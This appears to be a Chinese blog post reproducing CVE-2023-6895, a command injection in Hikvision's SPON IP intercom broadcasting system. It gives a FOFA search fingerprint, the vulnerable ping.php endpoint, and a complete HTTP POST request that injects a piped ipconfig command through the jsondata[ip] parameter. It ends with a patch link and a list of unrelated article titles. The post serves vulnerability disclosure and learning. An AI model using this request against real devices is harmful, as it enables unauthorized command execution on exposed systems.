当前位置: 首页 > news >正文

【漏洞复现】Hikvision SPON IP网络对讲广播系统命令执行漏洞(CVE-2023-6895)

文章目录

  • 前言
  • 声明
  • 一、系统简介
  • 二、漏洞描述
  • 三、影响版本
  • 四、漏洞复现
  • 五、修复建议


前言

Hikvision Intercom Broadcasting System是中国海康威视(Hikvision)公司的一个对讲广播系统。


声明

请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。


一、系统简介

Hikvision Intercom Broadcasting System是中国海康威视(Hikvision)公司的一个对讲广播系统。

二、漏洞描述

Hikvision Intercom Broadcasting System是中国海康威视(Hikvision)公司的一个对讲广播系统。Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE(HIK)版本存在操作系统命令注入漏洞,该漏洞源于文件/php/ping.php的参数jsondata[ip]会导致操作系统命令注入。

三、影响版本

海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE

四、漏洞复现

FOFA:icon_hash=“-1830859634”

漏洞链接:https://127.0.0.1/php/ping.php

漏洞数据包:

POST /php/ping.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Host: 127.0.0.1
Content-Length: 40
Content-Type: application/x-www-form-urlencodedjsondata[ip]=a|ipconfig&jsondata[type]=1

在这里插入图片描述

五、修复建议

请到官网下载补丁:https://www.spon.com.cn/

http://www.lryc.cn/news/284254.html

相关文章:

  • IDEA在重启springboot项目时没有自动重新build
  • 华为设备NAT的配置
  • 48-DOM节点,innerHTML,innerText,outerHTML,outerText,静态获取,单机click,cssText
  • 多输入多输出 | Matlab实现基于LightGBM多输入多输出预测
  • 【欢迎您的到来】这里是开源库get_local_info作者的付费专栏
  • Java SE入门及基础(23)
  • 蓝桥杯回文日期判断
  • Qt文件和目录相关操作
  • 递归、搜索与回溯算法(专题一:递归)
  • element-ui 打包流程源码解析(下)
  • ChatGPT给出的前端面试考点(Vue.js)
  • ChatGPT 商业提示词攻略书
  • Notepad++运行C语言输出乱码
  • 深入解析 Java 方法引用:Lambda 表达式的进化之路
  • MySQL作业 (3)多表查询
  • ConcurrentHashMap和HashMap的区别
  • MCM备赛笔记——图论模型
  • 算法笔记(动态规划入门题)
  • 开发实践_阶段三
  • codegeex和通义灵码辅助编程——以及通义灵码无法登陆的bug解决
  • Android14之DefaultKeyedVector实现(一百八十二)
  • 银河麒麟操作系统 v10 中离线安装 Docker
  • 如何系统的学习Python
  • Java并发基础:一文讲清util.concurrent包的作用
  • C++PythonC# 三语言OpenCV从零开发(2):教程选择
  • 【嘉立创EDA-PCB设计指南】3.网络表概念解读+板框绘制
  • nodejs前端项目的CI/CD实现(二)jenkins的容器化部署
  • python爬虫案例分享
  • 【CC++】为什么 scanf 函数在读取字符串时不需要用取地址运算符
  • Linux dirs命令教程:dirs命令详解与实例(附实例详解和注意事项)